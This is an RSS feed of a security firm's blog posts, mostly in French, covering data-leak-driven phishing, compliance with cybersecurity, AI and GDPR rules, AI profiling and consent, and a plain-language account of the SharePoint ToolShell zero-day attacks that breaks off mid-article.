<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Archives des Trainings - Varden Security</title>
	<atom:link href="https://www.varden-security.eu/category/trainings/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.varden-security.eu/category/trainings/</link>
	<description></description>
	<lastBuildDate>Fri, 15 Aug 2025 12:46:33 +0000</lastBuildDate>
	<language>fr-BE</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.varden-security.eu/wp-content/uploads/2025/10/cropped-Logo-flamme-SF-FB-32x32.png</url>
	<title>Archives des Trainings - Varden Security</title>
	<link>https://www.varden-security.eu/category/trainings/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Phishing : de l’email frauduleux à l’arme numérique multi-canaux et réputationnelle</title>
		<link>https://www.varden-security.eu/2025/08/15/phishing-de-lemail-frauduleux-a-larme-numerique-multi-canaux-et-reputationnelle/</link>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Fri, 15 Aug 2025 12:35:59 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156809</guid>

					<description><![CDATA[<p>L’article <a href="https://www.varden-security.eu/2025/08/15/phishing-de-lemail-frauduleux-a-larme-numerique-multi-canaux-et-reputationnelle/">Phishing : de l’email frauduleux à l’arme numérique multi-canaux et réputationnelle</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper"><div data-parent="true" class="vc_row row-container" id="row-unique-0"><div class="row limit-width row-parent"><div class="wpb_row row-inner"><div class="wpb_column pos-top pos-center align_left column_parent col-lg-12 single-internal-gutter"><div class="uncol style-light"  ><div class="uncoltable"><div class="uncell no-block-padding" ><div class="uncont" ><div class="uncode_text_column" ></p>
<p style="font-weight: 400;"><strong>Le phishing, menace persistante et en pleine mutation</strong></p>
<p style="font-weight: 400;"><strong>Il y a 20 ans, le phishing se résumait souvent à un email maladroit imitant une banque, incitant à cliquer sur un lien douteux pour “mettre à jour ses informations”.</strong></p>
<p style="font-weight: 400;">Aujourd’hui, ce type d’attaque est devenu une opération sophistiquée et multicanale, capable d’utiliser des données personnelles précises, obtenues à la faveur de cyberattaques ciblées ou de fuites massives, pour tromper même les utilisateurs les plus vigilants.</p>
<p style="font-weight: 400;"><strong>Quand une fuite alimente une attaque</strong></p>
<p style="font-weight: 400;">L’actualité récente en Italie illustre parfaitement le problème.</p>
<p style="font-weight: 400;">En août 2025, l’Agence italienne pour le numérique (Agid) a révélé le vol de près de 100 000 documents d’identité auprès d’une dizaine d’hôtels. Passeports, cartes d’identité, documents de check-in… tous en haute résolution, récupérés via des accès non autorisés entre juin et août 2025, puis mis en vente sur le dark web par un pirate connu sous le pseudonyme mydocs.</p>
<p style="font-weight: 400;">Ces données, déjà prêtes à l’emploi, permettent de :</p>
<ul style="font-weight: 400;">
<li>créer des campagnes de phishing hyper-ciblées (spear phishing) utilisant de vraies infos personnelles (nom, dates, destination du séjour, etc.) ;</li>
</ul>
<ul style="font-weight: 400;">
<li>se livrer à l’usurpation d’identité pour des fraudes financières ;</li>
</ul>
<ul style="font-weight: 400;">
<li>monter des scénarios de social engineering impossibles à distinguer d’un échange légitime.</li>
</ul>
<p style="font-weight: 400;"><strong>Le glissement vers le “phishing réputationnel”</strong></p>
<p style="font-weight: 400;">Traditionnellement, les cybercriminels ciblaient surtout des données chiffrées (bases de mots de passe, numéros de carte de crédit) à revendre ou à exploiter après décryptage.</p>
<p style="font-weight: 400;">Mais une tendance inquiétante s’impose : voler des données non chiffrées et exploitables immédiatement, car l’impact réputationnel sur l’entreprise victime fait souvent plus de dégâts — et plus vite — que la valeur marchande des données.</p>
<p style="font-weight: 400;">Ce que disent les rapports récents :</p>
<p style="font-weight: 400;"><strong>83 % des entreprises n’encryptent pas la majorité des données sensibles</strong> qu’elles stockent dans le cloud (Thales Cloud Security Study).</p>
<p style="font-weight: 400;">En 2024, des bases entières de données personnelles non chiffrées (38 Go) ont été retrouvées accessibles librement sur internet (TechRadar).</p>
<p style="font-weight: 400;"><strong>Une fuite majeure peut faire perdre 5 à 9 % de capital réputationnel à une marque</strong> (Oxford Academic), avec des impacts financiers et contractuels.</p>
<p style="font-weight: 400;"><strong>Les surfaces d’attaque actuelles</strong></p>
<p style="font-weight: 400;">Le phishing n’est plus confiné à l’email. Les attaquants opèrent sur :</p>
<ul style="font-weight: 400;">
<li>Email : toujours le canal le plus répandu, mais avec des messages soignés, sans fautes, traduits automatiquement par IA.</li>
</ul>
<ul style="font-weight: 400;">
<li>SMS / messageries instantanées (smishing, quishing) : liens courts, QR codes malveillants.</li>
</ul>
<ul style="font-weight: 400;">
<li>Appels téléphoniques (vishing) : voix synthétiques imitant des interlocuteurs connus.</li>
</ul>
<ul style="font-weight: 400;">
<li>Réseaux sociaux / plateformes professionnelles : faux profils, usurpation d’identité visuelle.</li>
</ul>
<ul style="font-weight: 400;">
<li>Sites clones : pages web copiées à l’identique avec certificats HTTPS valides.</li>
</ul>
<p style="font-weight: 400;"><strong>Les surfaces d’attaque du futur</strong></p>
<p style="font-weight: 400;">Les tendances qui se dessinent pour les prochaines années sont préoccupantes :</p>
<ul style="font-weight: 400;">
<li>Deepfakes vocaux et vidéo : conversations vidéo avec un faux visage ou une voix imitée.</li>
</ul>
<ul style="font-weight: 400;">
<li>Chatbots frauduleux : usurpation d’assistants IA d’entreprises pour tromper les clients.</li>
</ul>
<ul style="font-weight: 400;">
<li>Phishing contextuel en temps réel : exploitation de données volées “juste après” un événement réel (réservation, paiement, déplacement).</li>
</ul>
<ul style="font-weight: 400;">
<li>Attaques multi-canaux synchronisées : email + SMS + appel téléphonique pour rendre le scénario crédible.</li>
</ul>
<p style="font-weight: 400;"><strong>Les données, carburant des attaques</strong></p>
<p style="font-weight: 400;">Le lien entre fuite de données et phishing ciblé est direct.</p>
<p style="font-weight: 400;">Plus les données volées sont précises, plus l’attaque semble légitime.</p>
<p style="font-weight: 400;">Les criminels croisent plusieurs fuites pour construire un profil complet de la victime.</p>
<p style="font-weight: 400;">La frontière entre un message légitime et une attaque devient floue.</p>
<p style="font-weight: 400;"><strong>Comment réduire l’exposition</strong></p>
<p style="font-weight: 400;">Côté entreprises:</p>
<ul style="font-weight: 400;">
<li>Collecter moins : limiter la conservation des données au strict nécessaires</li>
<li>Chiffrer systématiquement les données sensibles au repos et en transit.</li>
<li>Segmenter les systèmes : isoler les bases critiques et limiter les accès.</li>
<li>Former le personnel : simulations régulières de phishing, sensibilisation aux signaux d’alerte.</li>
<li>Surveiller le dark web pour détecter les fuites précocement.</li>
</ul>
<p style="font-weight: 400;">Côté particuliers:</p>
<ul style="font-weight: 400;">
<li>Douter des urgences : vérifier tout message “urgent” par un canal officiel.</li>
<li>Activer l’authentification multi-facteur partout où c’est possible.</li>
<li>Contrôler ses données : utiliser des services de notification en cas de fuite (ex. Have I Been Pwned).</li>
<li>Limiter le partage d’informations personnelles sur les réseaux.</li>
</ul>
<p style="font-weight: 400;"><strong>Évolution du phishing et sophistication des données exploitées</strong></p>
<p>&nbsp;</p>
<p><img fetchpriority="high" decoding="async" class="size-medium wp-image-156815 alignleft" src="https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-300x300.jpeg" alt="" width="300" height="300" srcset="https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-300x300.jpeg 300w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-150x150.jpeg 150w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-768x768.jpeg 768w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-350x350.jpeg 350w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-348x348.jpeg 348w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-600x600.jpeg 600w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17-100x100.jpeg 100w, https://www.varden-security.eu/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-15-at-14.10.17.jpeg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p style="font-weight: 400;">2000–2010 Emails/login génériques Email Faible</p>
<p style="font-weight: 400;">2010–2020 Identifiants volés, logs simples Email, SMS, réseaux sociaux Moyenne</p>
<p style="font-weight: 400;">2020–2030 Scans identités, habitudes de vie Email, SMS, appels IA, deepfakes, chatbots Très élevée</p>
<p style="font-weight: 400;"><strong>Bibliographie</strong></p>
<p style="font-weight: 400;">Thales Cloud Security Study – 83 % des entreprises n’encryptent pas toutes leurs données sensibles cloud.</p>
<p style="font-weight: 400;">TechRadar – 38 Go de données personnelles non chiffrées exposées en ligne.</p>
<p style="font-weight: 400;">Oxford Academic – Impact réputationnel de -5 à -9 % après une fuite majeure.</p>
<p style="font-weight: 400;">Axios – 1,7 milliard de notifications de fuite envoyées en 2024.</p>
<p style="font-weight: 400;">Tom’s Guide – 16 milliards d’identifiants exposés, alimentant des campagnes de phishing massives.</p>
<p>
</div></div></div></div></div></div><script id="script-row-unique-0" data-row="script-row-unique-0" type="text/javascript" class="vc_controls">UNCODE.initRow(document.getElementById("row-unique-0"));</script></div></div></div>
</div><p>L’article <a href="https://www.varden-security.eu/2025/08/15/phishing-de-lemail-frauduleux-a-larme-numerique-multi-canaux-et-reputationnelle/">Phishing : de l’email frauduleux à l’arme numérique multi-canaux et réputationnelle</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Cybersécurité, IA, RGPD : le trio stratégique que tout entrepreneur doit maîtriser</title>
		<link>https://www.varden-security.eu/2025/08/05/cybersecurite-ia-rgpd-le-trio-strategique-que-tout-entrepreneur-doit-maitriser/</link>
					<comments>https://www.varden-security.eu/2025/08/05/cybersecurite-ia-rgpd-le-trio-strategique-que-tout-entrepreneur-doit-maitriser/#respond</comments>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Tue, 05 Aug 2025 16:51:28 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156787</guid>

					<description><![CDATA[<p>L’article <a href="https://www.varden-security.eu/2025/08/05/cybersecurite-ia-rgpd-le-trio-strategique-que-tout-entrepreneur-doit-maitriser/">Cybersécurité, IA, RGPD : le trio stratégique que tout entrepreneur doit maîtriser</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper"><div data-parent="true" class="vc_row row-container" id="row-unique-1"><div class="row limit-width row-parent"><div class="wpb_row row-inner"><div class="wpb_column pos-top pos-center align_left column_parent col-lg-12 single-internal-gutter"><div class="uncol style-light"  ><div class="uncoltable"><div class="uncell no-block-padding" ><div class="uncont" ><div class="uncode_text_column" ><p>Cybersécurité, IA, RGPD : le trio stratégique que tout entrepreneur doit maîtriser</p>
<p style="font-weight: 400;">À l’ère du numérique intelligent, les entrepreneurs ne peuvent plus ignorer trois piliers qui conditionnent leur croissance et leur crédibilité : la cybersécurité, l’intelligence artificielle et la conformité RGPD.</p>
<p style="font-weight: 400;">Ces sujets ne sont plus l’affaire exclusive des juristes, des RSSI ou des data scientists. Ils sont devenus les fondations d’un modèle d’entreprise moderne, éthique et scalable. Et surtout, ils ne fonctionnent pas en silo : ils s’entrelacent profondément.</p>
<p><img decoding="async" class=" wp-image-156732 alignright" src="https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-300x201.jpg" alt="" width="331" height="222" srcset="https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-300x201.jpg 300w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-1024x685.jpg 1024w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-768x513.jpg 768w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-1536x1027.jpg 1536w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-2048x1369.jpg 2048w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-350x234.jpg 350w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-1320x883.jpg 1320w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-600x401.jpg 600w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-uai-720x481.jpg 720w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19-uai-1032x688.jpg 1032w, https://www.varden-security.eu/wp-content/uploads/2025/08/Capture-decran-2025-08-01-a-20.52.19.jpg 2058w" sizes="(max-width: 331px) 100vw, 331px" /></p>
<h1>1. La cybersécurité : la base invisible mais vitale</h1>
<p style="font-weight: 400;">Les startups et PME sont les premières victimes des cyberattaques. Un simple e-mail piégé, un mot de passe réutilisé ou un outil mal configuré peut ouvrir la porte à des rançongiciels, vols de données clients ou paralysie opérationnelle.</p>
<p style="font-weight: 400;">Ce que beaucoup ignorent, c’est que sans socle de sécurité robuste, il est impossible de se mettre en conformité RGPD ou de faire tourner une IA de façon éthique. L’infrastructure, les accès, le chiffrement : tout commence ici.</p>
<p style="font-weight: 400;">Un élément essentiel souvent négligé est le **pentesting** (test d’intrusion). Il permet de simuler des attaques réelles pour identifier les failles avant qu’elles ne soient exploitées. C’est un outil stratégique, non seulement pour sécuriser vos systèmes, mais aussi pour démontrer votre vigilance à vos partenaires et clients.</p>
<p style="font-weight: 400;">Autre point crucial : la conformité à la directive **NIS2** (Network and Information Systems Directive 2). Applicable dès 2024, elle impose aux entreprises de secteurs critiques (mais aussi à de nombreuses PME fournisseurs de services numériques) de se doter de mesures de cybersécurité robustes, de notifier les incidents, et de prouver leur résilience opérationnelle.</p>
<h1>2. L’IA : puissante, mais fragile sans règles</h1>
<p style="font-weight: 400;">L’intelligence artificielle peut devenir un accélérateur incroyable : automatisation, personnalisation, analyse prédictive… Mais elle repose sur des données (souvent personnelles), et prend des décisions (parfois sensibles).</p>
<p style="font-weight: 400;">L’AI Act impose désormais des obligations fortes : transparence, auditabilité, documentation, robustesse. Sans cybersécurité pour éviter la corruption des modèles ou les fuites de données, et sans RGPD pour encadrer les données d’entraînement, votre IA devient un risque juridique et réputationnel.</p>
<h1>3. Le RGPD : bien plus qu’un cadre légal</h1>
<p style="font-weight: 400;">Souvent vu comme un frein, le RGPD est en réalité une opportunité de structurer une relation saine avec vos utilisateurs et partenaires. En maîtrisant vos traitements de données, en respectant les droits des personnes (accès, rectification, suppression) et en garantissant un haut niveau de sécurité, vous gagnez en crédibilité.</p>
<h1>Pourquoi Varden peut vous aider</h1>
<p style="font-weight: 400;">Mettre en œuvre ce triptyque demande des compétences pointues, une vision transversale et une veille constante sur les règlementations. C’est là qu’intervient Varden Security, une société spécialisée dans la cybersécurité proactive, l&rsquo;accompagnement réglementaire et les environnements IA sécurisés.</p>
<p style="font-weight: 400;">Varden propose : des solutions de sécurité managées adaptées aux PME et startups, des audits pour la conformité RGPD et NIS2, du pentesting, et un accompagnement expert pour fiabiliser vos projets IA dès leur conception.</p>
<h1>En résumé</h1>
<p style="font-weight: 400;">Ce ne sont pas trois chantiers séparés. Ce sont trois dimensions d’une même maturité numérique. Celles et ceux qui l’ont compris prennent de l’avance – pas seulement pour éviter les amendes, mais pour créer une entreprise résiliente, durable, et alignée avec les exigences du XXIe siècle.</p>
<p>Screenshot</p>
</div></div></div></div></div></div><script id="script-row-unique-1" data-row="script-row-unique-1" type="text/javascript" class="vc_controls">UNCODE.initRow(document.getElementById("row-unique-1"));</script></div></div></div>
</div><p>L’article <a href="https://www.varden-security.eu/2025/08/05/cybersecurite-ia-rgpd-le-trio-strategique-que-tout-entrepreneur-doit-maitriser/">Cybersécurité, IA, RGPD : le trio stratégique que tout entrepreneur doit maîtriser</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/08/05/cybersecurite-ia-rgpd-le-trio-strategique-que-tout-entrepreneur-doit-maitriser/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>IA, consentement et contrôle : Qui possède votre trace numérique en 2025 ?</title>
		<link>https://www.varden-security.eu/2025/08/01/ai-consent-and-control-who-owns-your-digital-shadow-in-2025-2/</link>
					<comments>https://www.varden-security.eu/2025/08/01/ai-consent-and-control-who-owns-your-digital-shadow-in-2025-2/#respond</comments>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Fri, 01 Aug 2025 09:04:26 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156726</guid>

					<description><![CDATA[<p>En 2025, l’intelligence artificielle ne repose plus uniquement sur des données explicites. Elle s’épanouit à partir de signaux que nous [&#8230;]</p>
<p>L’article <a href="https://www.varden-security.eu/2025/08/01/ai-consent-and-control-who-owns-your-digital-shadow-in-2025-2/">IA, consentement et contrôle : Qui possède votre trace numérique en 2025 ?</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3><b>En 2025, l’intelligence artificielle ne repose plus uniquement sur des données explicites.</b></h3>
<p class="p3">Elle s’épanouit à partir de signaux que nous ignorons émettre — des schémas de comportement, le ton de notre voix, nos habitudes de défilement, les micro-délai dans notre frappe. Ces fragments, assemblés par des modèles d’apprentissage automatique, forment ce que l’on appelle de plus en plus notre <span class="s2"><b>« trace numérique »</b></span>.</p>
<p class="p3">Cette ombre numérique n’est pas une simple métadonnée.</p>
<p class="p3">C’est une <span class="s2"><b>simulation en temps réel de ce que vous êtes</b></span>, utilisée pour prédire ce que vous ferez, ressentirez ou choisirez.</p>
<p class="p4"><span class="s3">Et la véritable question aujourd’hui </span><b>n’est plus de savoir si nous sommes observés</b><span class="s3">, mais bien </span><b>si nous conservons notre libre arbitre</b><span class="s3"> dans un monde où l’IA </span><b>interprète et agit en notre nom</b><span class="s3"> — souvent </span><b>sans notre connaissance ni notre consentement</b><span class="s3">.</span></p>
<h3><b>Le profil invisible</b></h3>
<p class="p3">Les préoccupations traditionnelles liées à la vie privée portaient sur les fuites de données, les mots de passe piratés ou les cookies intrusifs.</p>
<p class="p3">En 2025, la menace est plus <span class="s2"><b>subtile et systémique</b></span> : <span class="s2"><b>l’inférence</b></span>.</p>
<p class="p3">Les systèmes d’IA ne se contentent plus de stocker vos données :</p>
<p class="p4"><span class="s3">ils construisent des </span><b>profils comportementaux complexes</b><span class="s3"> pour </span><b>anticiper vos décisions</b><span class="s3">.</span></p>
<p class="p3">Qu’il s’agisse d’un service financier évaluant votre solvabilité ou d’un assistant numérique filtrant votre fil d’actualité, ces systèmes s’appuient sur des <span class="s2"><b>modèles probabilistes</b></span> construits à partir de votre <span class="s2"><b>exhaust numérique</b></span>.</p>
<p class="p3">Vous n’y avez pas forcément consenti — en tout cas, <span class="s2"><b>pas directement</b></span>.</p>
<p class="p3">Mais le simple fait d’être en ligne <span class="s2"><b>entraîne mécaniquement ces modèles</b></span>.</p>
<h3><b>Le consentement par défaut</b></h3>
<p class="p3">La collecte de données par les plateformes a évolué :</p>
<p class="p4"><span class="s3">elle est passée d’un </span><b>opt-in explicite</b><span class="s3"> à une </span><b>passivité par défaut</b><span class="s3">.</span></p>
<p class="p3">Les politiques de confidentialité sont opaques, les formulaires de consentement volontairement ambigus, et <span class="s2"><b>l’inférence algorithmique est rarement encadrée par la loi</b></span>.</p>
<p class="p3">Pire encore, l’émergence d’<span class="s2"><b>analyses générées par l’IA</b></span> — des scores de personnalité aux prédictions en santé mentale — crée une <span class="s2"><b>zone grise</b></span> :</p>
<p class="p3">même si les données brutes vous appartiennent, <span class="s2"><b>les interprétations aussi ?</b><b></b></span></p>
<p class="p3">Dans la plupart des cadres juridiques, la réponse est floue.</p>
<p class="p3">Le <span class="s2"><b>RGPD</b></span>, par exemple, régule les <span class="s2"><b>données personnelles</b></span>, mais dit peu de choses sur les <span class="s2"><b>traits inférés</b></span> ou les <span class="s2"><b>prédictions algorithmiques</b></span>.</p>
<p class="p3">Ce vide juridique expose les utilisateurs à une nouvelle forme de <span class="s2"><b>colonialisme des données</b></span> — où des machines extraient de la valeur à partir de notre comportement, <span class="s2"><b>sans que nous n’ayons jamais vu la carte</b></span>.</p>
<h3><b>La propriété algorithmique</b></h3>
<p class="p4"><b>Qui possède votre trace ?</b><b></b></p>
<ul>
<li>
<p class="p1">Les courtiers en données disent : « c’est anonymisé ».</p>
</li>
<li>
<p class="p1">Les plateformes disent : « ce sont des inférences, pas des données ».</p>
</li>
<li>
<p class="p1">Les régulateurs disent : « nous travaillons dessus ».</p>
</li>
</ul>
<p class="p4"><span class="s3">Pendant ce temps, le </span><b>profilage prédictif redéfinit l’accès à l’emploi, le scoring de crédit, les tarifs d’assurance ou le ciblage politique</b><span class="s3">.</span></p>
<p class="p3">Une <span class="s2"><b>IA que vous ne rencontrerez jamais prend des décisions</b></span> basées sur une version de vous qu’elle a elle-même construite —</p>
<p class="p4"><span class="s3">un </span><b>jumeau probabiliste</b><span class="s3"> que </span><b>vous ne pouvez ni auditer ni corriger</b><span class="s3">.</span></p>
<p class="p3">Ces profils IA doivent-ils être reconnus comme <span class="s2"><b>données personnelles</b></span> ?</p>
<p class="p4"><span class="s3">Les individus doivent-ils avoir le </span><b>droit d’y accéder, de les supprimer, ou de les contester</b><span class="s3"> ?</span></p>
<p class="p4"><b>Techniquement, c’est possible. Éthiquement, c’est indispensable. Légalement, nous sommes en retard.</b><b></b></p>
<h3><b>Une voie à suivre</b></h3>
<p class="p3">Des solutions émergent :</p>
<ul>
<li>
<p class="p1"><b>Apprentissage fédéré</b><b></b></p>
</li>
<li>
<p class="p1"><b>Confidentialité différentielle</b><b></b></p>
</li>
<li>
<p class="p1"><b>Coffres-forts de données contrôlés par l’utilisateur</b></p>
</li>
</ul>
<p>&nbsp;</p>
<p class="p3">Mais le vrai défi n’est <span class="s2"><b>ni technique, ni juridique</b></span> :</p>
<p class="p4"><span class="s3">il est </span><b>politique et culturel</b><span class="s3">.</span></p>
<p class="p4"><span class="s3">Nous devons </span><b>repenser la notion d’agence numérique</b><span class="s3">.</span></p>
<p class="p4"><span class="s3">Le </span><b>consentement ne peut être passif</b><span class="s3">.</span></p>
<p class="p4"><span class="s3">Le </span><b>profilage ne peut être invisible</b><span class="s3">.</span></p>
<p class="p4"><span class="s3">L’IA ne peut pas </span><b>agir en votre nom sans mécanisme de contrôle ou de recours</b><span class="s3">.</span></p>
<p class="p4"><span class="s3">Concevoir une véritable transparence impose de </span><b>réinventer le design des interfaces</b><span class="s3">, les </span><b>modèles économiques</b><span class="s3"> et la </span><b>gouvernance des données</b><span class="s3">.</span></p>
<p class="p4"><span class="s3">Cela signifie </span><b>outiller les citoyens — pas seulement les entreprises — pour qu’ils puissent gérer leur présence numérique.</b><b></b></p>
<h3></h3>
<h3><b>Conclusion : la nouvelle frontière des droits numériques</b></h3>
<p class="p3">En 2025, les droits numériques ne se résument plus à <span class="s2"><b>ce que vous partagez consciemment</b></span>.</p>
<p class="p4"><span class="s3">Ils concernent </span><b>ce que d’autres déduisent, synthétisent et exploitent</b><span class="s3"> — à partir des </span><b>ombres que vous ignoriez avoir laissées derrière vous</b><span class="s3">.</span></p>
<p>L’article <a href="https://www.varden-security.eu/2025/08/01/ai-consent-and-control-who-owns-your-digital-shadow-in-2025-2/">IA, consentement et contrôle : Qui possède votre trace numérique en 2025 ?</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/08/01/ai-consent-and-control-who-owns-your-digital-shadow-in-2025-2/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SharePoint Under Fire: When Collaboration Becomes a Gateway to Cyberattacks!</title>
		<link>https://www.varden-security.eu/2025/07/23/sharepoint-under-fire-when-collaboration-becomes-a-gateway-to-cyberattacks/</link>
					<comments>https://www.varden-security.eu/2025/07/23/sharepoint-under-fire-when-collaboration-becomes-a-gateway-to-cyberattacks/#respond</comments>
		
		<dc:creator><![CDATA[Stéphane Pochet]]></dc:creator>
		<pubDate>Wed, 23 Jul 2025 15:24:00 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156516</guid>

					<description><![CDATA[<p>L’article <a href="https://www.varden-security.eu/2025/07/23/sharepoint-under-fire-when-collaboration-becomes-a-gateway-to-cyberattacks/">SharePoint Under Fire: When Collaboration Becomes a Gateway to Cyberattacks!</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper"><div data-parent="true" class="vc_row row-container" id="row-unique-2"><div class="row limit-width row-parent"><div class="wpb_row row-inner"><div class="wpb_column pos-top pos-center align_left column_parent col-lg-12 single-internal-gutter"><div class="uncol style-light"  ><div class="uncoltable"><div class="uncell no-block-padding" ><div class="uncont" ><div class="uncode_text_column" ></p>
<h2><b>Le scénario cauchemardesque que personne ne voulait voir se réaliser est en train de se produire : </b></h2>
<h2><b>Microsoft SharePoint,</b><b> la célèbre plateforme de collaboration utilisée par des milliers d’entreprises dans le monde, fait l’objet d’une </b><b>attaque massive ex</b><b>ploitant des </b><b>failles zero-day</b></h2>
<p>&nbsp;</p>
<p class="p3"><span class="s2">En termes simples : des vulnérabilités </span><b>inconnues jusqu’à récemment</b><span class="s2">, pour lesquelles </span><b>aucun correctif n’était disponible</b><span class="s2">.</span></p>
<p class="p4">La situation est <span class="s3"><b>critique</b></span>, et <span class="s3"><b>le temps presse</b></span> pour de nombreuses organisations.</p>
<h2><b>Talon d’Achille exposé : </b></h2>
<h2><b>CVE-2025-53770</b></h2>
<h2><b> et ses sinistres consœurs</b></h2>
<p class="p4">Imaginez que vos bureaux soient une forteresse — mais qu’un attaquant découvre une <span class="s3"><b>porte secrète</b></span> inconnue même de vos architectes.</p>
<p class="p4">C’est exactement ce qui se passe avec les vulnérabilités zero-day comme <span class="s3"><b>CVE-2025-53770</b></span>, récemment mise en lumière.</p>
<p class="p4">Cette faille — ainsi que <span class="s3"><b>CVE-2025-49706</b></span> et <span class="s3"><b>CVE-2025-49704</b></span> — exploite la manière dont SharePoint traite <span class="s3"><b>des données non fiables</b></span>.</p>
<h2><b>L’attaque expliquée : comment exploite-t-on cette faille ?</b></h2>
<p class="p4">Le cœur du problème : la <span class="s3"><b>désérialisation de données non fiables</b></span> et la manipulation des <span class="s3"><b>MachineKeys</b></span> de SharePoint.</p>
<p class="p4">En clair : SharePoint reçoit certaines instructions sous forme sérialisée — des données structurées censées être converties en commandes exécutables.</p>
<p class="p4">Mais si un attaquant parvient à <span class="s3"><b>modifier ces données avant la désérialisation</b></span>, il peut tromper SharePoint.</p>
<p class="p4">C’est comme si vous donniez à un robot un <span class="s3"><b>faux ordre</b></span> lui disant de voler vos clés.</p>
<p class="p4">Dans le cas de SharePoint, cela permet :</p>
<ul>
<li>
<p class="p1"><b>Exécution de code à distance (RCE)</b><span class="s1"> – le Graal du cybercriminel.</span></p>
<p class="p2">L’attaquant peut envoyer des commandes personnalisées que SharePoint exécutera comme si elles étaient légitimes.</p>
<p class="p2">C’est comme <span class="s2"><b>prendre le contrôle du cerveau</b></span> de votre système.</p>
</li>
<li>
<p class="p1"><b>Vol des clés cryptographiques (MachineKeys)</b><span class="s1"> – ces clés sont les </span><b>clés maîtresses de votre royaume numérique</b><span class="s1">.</span></p>
<p class="p2">Elles servent à chiffrer les données sensibles et à authentifier les utilisateurs.</p>
<p class="p2">Une fois volées, <span class="s2"><b>les attaquants peuvent se faire passer pour n’importe qui</b></span> — même après application des correctifs.</p>
</li>
<li>
<p class="p1"><span class="s1"><b>Déploiement de web shells</b></span> – de petits fichiers malveillants installés sur le serveur, <span class="s1"><b>agissant comme des portes dérobées</b></span>.</p>
<p class="p1">Même après correction de la faille, l’attaquant peut <span class="s1"><b>revenir à tout moment</b></span>.</p>
<p class="p1">C’est comme un <span class="s1"><b>tunnel secret</b></span> dans vos murs.</p>
</li>
</ul>
<p class="p4">Ces attaques, souvent désignées sous le nom <span class="s3"><b>ToolShell</b></span>, ont <span class="s3"><b>déjà touché des dizaines d’organisations</b></span>, y compris des entités gouvernementales et de grandes entreprises.</p>
<p class="p4">Elles concernent <span class="s3"><b>principalement les serveurs SharePoint “on-premise”</b></span>, <span class="s3"><b>pas</b></span> SharePoint Online (version cloud de Microsoft 365).</p>
